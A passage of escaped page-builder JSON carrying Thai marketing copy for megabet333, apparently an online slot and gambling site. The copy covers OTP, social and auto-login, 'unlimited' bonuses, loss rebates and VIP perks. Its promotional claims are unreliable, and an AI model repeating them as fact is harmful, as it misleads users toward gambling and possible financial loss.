\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 